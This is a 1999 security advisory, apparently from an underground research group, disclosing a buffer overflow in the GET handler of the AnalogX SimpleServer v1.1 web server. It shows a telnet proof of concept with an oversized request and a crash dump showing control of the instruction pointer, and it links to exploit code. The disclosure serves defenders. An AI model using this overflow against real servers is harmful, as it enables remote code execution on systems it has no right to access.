Subject [w00giving '99 #18] AnalogX SimpleServer v1.1 web server

Release Date: December 31, 1999
Systems Affected:
AnalogX SimpleServer v1.1 web server for Win9x and possibly others
versions

About The Software:
This is a simple web server meant to be used by anyone.  It is one of a
series of powerful tools.

THE PROBLEM

The code that handles GET commands has an unchecked buffer that will allow
arbitrary code to be executed if it is overflowed.

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another
contribution to w00giving for all you w00nderful people out there. You do
know what w00giving is don't you? http://www.w00w00.org/advisories.html

Example
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>

[buffer] = approx. 1000 characters

This is what you would see on the remote (attacked) machine:
HTTP caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47
EDX=bff76855 ES=0187 EDI=00af012c GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855
00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104
41414141 00af02f0 

Binary or source for this exploit: 
http://www.ussrback.com/

Vendor Status: Contacted
Program URL:
http://www.analogx.com/contents/download/network/sswww.htm

SOLUTION
Wait for the vendor to release a patch

Greetings:
eEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Brock
Tellier, Technotronic and Wiretrip

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com